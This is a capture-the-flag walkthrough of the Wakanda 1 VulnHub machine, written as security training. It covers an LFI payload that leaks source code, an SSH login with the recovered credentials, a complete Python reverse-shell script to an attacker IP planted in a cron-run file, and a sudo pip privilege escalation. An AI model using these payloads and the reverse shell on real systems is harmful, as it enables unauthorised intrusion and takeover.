In this article, we will learn to solve a Capture the Flag (CTF) challenge which was posted on VulnHub by xMagass. According to the information given in the description by the author of the challenge, this is an intermediate-level Capture-the-Flag Challenge (CTF). The target of the CTF is to get the root access of the machine and read the flag files. It has three flags which need to be collected while completing the challenge.

You can download the VM and launch it on Virtual Box with this link. The torrent downloadable URL is also available for this VM, which is given in the reference section at the end of this article.

For those who are new to CTF challenges and are not aware of this platform, VulnHub is a well-known website for security researchers. It provides users with a method to learn and practice their hacking skills through a series of challenges in a safe and legal environment.

Please Note: For all of these machines, I have used Oracle Virtual Box to run the downloaded machine. I would be using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

The Walkthrough

After downloading and running this machine in Virtual Box, we need to find the target machine’s IP address. For this, I started by running the Netdiscover command to obtain the IP address of the target machine. The command and its output can be seen in the screenshot given below:

Command Used: Netdiscover

 

As shown in the highlighted area in the above screenshot, we have obtained the virtual machine’s IP address, 192.168.1.11 (the target machine IP address).

We will be using 192.168.1.45 as the attacker IP address.

Please Note: The target and the attacker machine IP address may be different, depending upon the network configuration.

So now that we have the target machine IP, the first step is to find out the ports and services that are available on the target machine. An Nmap full-port scan is used for this purpose. This is illustrated in the screenshot given below:

Command Used: nmap -p- 192.168.1.11 -sV

After the completion of the scan, we found four ports to be open on the target machine. Let’s start with HTTP port. I opened the target machine IP on the browser and a website was shown on the browser. It can be seen in the screenshot given below.

As can be seen in the above screenshot, a website is running on the HTTP server and the homepage is just showing the “coming soon” message. So I started a manual analysis of the HTML page and, side-by-side, I also run the Dirb scan to enumerate other entry points in the application. This can be seen in the following screenshot.

Command Used: dirb http://192.168.1.11/

There are some directories identified by the Dirb utility, but the size of the response is 0 bytes. It means that the pages which have the 200 response code will be blank.

During the manual analysis of the HTML content, we found a parameter in the comments section which can be seen in the following screenshot.

As canbe seen in the highlighted area of the above screenshot, there is a “lang” parameter in the comments which was found to be vulnerable for Local File Inclusion (LFI). So I exploited the LFI vulnerability in this parameter to download the content of the index file, which can be seen in the following screenshot.

Payload Used: lang=php://filter/convert.base64-encode/resource=index

As you can see, our payload was successfully executed on the target machine and we received the base64 encoded data in the response. Let’s decode this to check the actual source code of the index.php file. For that, we used Burp Decoder:

After decoding the index file, we found a password in the source code which can be seen in the highlighted area of the above screenshot. The identified password is given below.

Password: Niamey4Ever227!!!

So now we have the password, and from the port scan we know that SSH service is also running on the target machine. But we do not know the username. I tried this password with some default usernames, but that did not work.

After spending some time, I observed that there is a username in the HTML content of the index page. It can be seen in the following screenshot.

In the highlighted area we can see “Made by,” which indicates that it could be a valid username for the SSH. The username is also given below.

Username: mamadou

Since we already have the password from the source code and SSH service is also running on the target machine, let’s try to login into the system with the following credentials:

Username: mamadou
Password: Niamey4Ever227!!!

Command Used:  ssh mamadou@192.168.1.11 -p 3333

As can be seen in the above screenshot, the credentials worked, and we could successfully log into the target system. However,  we did not get the command shell, as it was a Python shell. So it’s time to run our favorite Python command to get us bash shell access. It can be seen in the following screenshot.

Command Used: import pty; pty.spawn(“/bin/bash”)

So we finally gained access to the command shell of the target machine. After that, I used the ls command, which showed the ‘flag1.txt’ file. So let’s read our first flag, which can be seen in the following screenshot.

We’ve captured the first flag! Now, let’s check the version of the kernel and Linux operating system.

Command Used:

  • uname -a
  • cat /etc/issue

As you can see, we have retrieved information about the kernel version and the operating version. Now it’s time to check for any available local exploits for these versions over the Internet.

Turns out there are a lot of exploits available on Google, but none of them worked for this machine. So I left this here and tried to find a different approach for this. I analyzed the /etc/passwd file and found that there was another user, “DevOps,” available on the target.

User “DevOps” has the bash access on the target machine. So let’s check all the DevOps user’s files for weak file permissions.

Command Used : find / -user devops 2>/dev/null

We’ve found some files. One of the interesting files was ‘.antivirus.py’ file, which had the write permission for all the users. So let’s read this file to see the contents.

After getting the understanding of this code, we saw that it is written to open a test file which is situated in the ‘tmp’ directory and it is writing “test” in it. So, I checked the ‘tmp’ folder for a test file. Since the owner of the file was DevOps, it is running with the DevOps user. If we are able to write a Python reverse connection program and replace it with “.antivirus.py,” then we will get another DevOps user shell. Let’s do this.

I created a Python program on my local machine and transferred it to the target machine “tmp” folder by using the wget utility. The python program can be seen in the following screenshot.

#! /usr/bin/python

import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((“192.168.1.45”,4545));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call([“/bin/sh”,”-i”]);

Command Used:

  • wget 192.168.1.45/pythonshell.py
  • cp pythonshell.py /srv/.antivirus.py

After that, we started the listener on port 4545 to receive the reverse shell and let us wait for the Cron to run. After waiting for some time, we got the reverse shell on the target machine. It can be seen in the following screenshot.

Command Used:

  • nc –lvp 4545

We have got the reverse shell. After that, I ran the “id” command to check the user, which confirms that we have an access on the target machine as a “DevOps” user. Now let’s run the Python command to take the stable shell access, which can be seen in the following screenshot.

Command Used:

  • python -c ‘import pty;pty.spawn(“/bin/bash”)’ (Used to take the stable shell)
  • cd /home/devops (Used to change the current directory to DevOps)
  • ls (Used to list the file)
  • cat flag2.txt (Used to read the flag2.txt file)

As can be seen in the above screenshot, we have the DevOps user, and there was another flag in the DevOps home directory which we have captured.

So only the last flag is remaining now to complete the challenge. Since the DevOps user is also not a root user, we also need to get the root access of this machine to complete the challenge. I am sure that when we get the root access, then we can get the root flag also.

As the DevOps user, I ran sudo command which returned an error. It can be seen in the following screenshot.

Command Used: sudo -l

After running the sudo -l command, we found that /user/bin/pip can be run as root user without any password.

So I searched for the pip service exploit and downloaded the same on the target machine by using the wget utility. After this, I had to execute the exploit on the target machine, as explained on the pip exploit blog. The exploit URL used in this article has been added in the reference section at the end of this article.

Command Used:

  • wget 192.168.1.45/bbbb/setup.py (Used to download the exploit from the local machine)
  • sudo /usr/bin/pip install . –upgrade –force-reinstall (Used to run the exploit)

As explained in the above commands, we first started the Netcat listener on the port 443 and then ran the exploit, which provided the root shell of the target machine. This can be seen in the screenshot given below.

So we finally have the root access on the target machine! It’s time to find and read the third flag to complete the challenge. The third flag was easily found in the root directory and can be seen in the following screenshot.

We got the final flag! This completes this CTF.

I hope you liked this article and enjoyed learning this machine. I would love to answer your questions if you put them in the comments. Until next time!

 

Sources

FakePip, GitHub

Wakanda1, VulnHub

Wakanda 1 (torrent), VulnHub

Spool Privilege Escalation, Exploit Database